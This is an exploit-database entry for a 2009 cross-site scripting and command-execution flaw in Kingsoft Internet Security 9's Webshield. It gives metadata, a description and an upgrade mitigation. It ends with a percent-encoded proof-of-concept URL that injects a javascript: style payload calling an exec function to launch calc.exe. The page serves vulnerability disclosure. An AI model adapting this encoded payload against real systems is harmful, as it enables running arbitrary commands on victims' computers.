Webshield Feature of Kingsoft Internet Security 9 Remote Cross-Site Scripting and Command-Execution Vulnerability

vendor:

Kingsoft Internet Security 9

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Cross-Site Scripting and Command-Execution

CWE

Product Name: Kingsoft Internet Security 9

Affected Version From: 1.1.0.62

Affected Version To: Prior Versions

Patch Exists: YES

Related CWE: N/A

CPE: a:kingsoft:kingsoft_internet_security_9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Webshield Feature of Kingsoft Internet Security 9 Remote Cross-Site Scripting and Command-Execution Vulnerability

The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability. Remote attackers may exploit this vulnerability to compromise an affected computer.

Mitigation:

Upgrade to the latest version of Kingsoft Internet Security 9

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35038/info

The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.

Remote attackers may exploit this vulnerability to compromise an affected computer.

This issue affects WebShield 1.1.0.62 and prior versions. 

http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e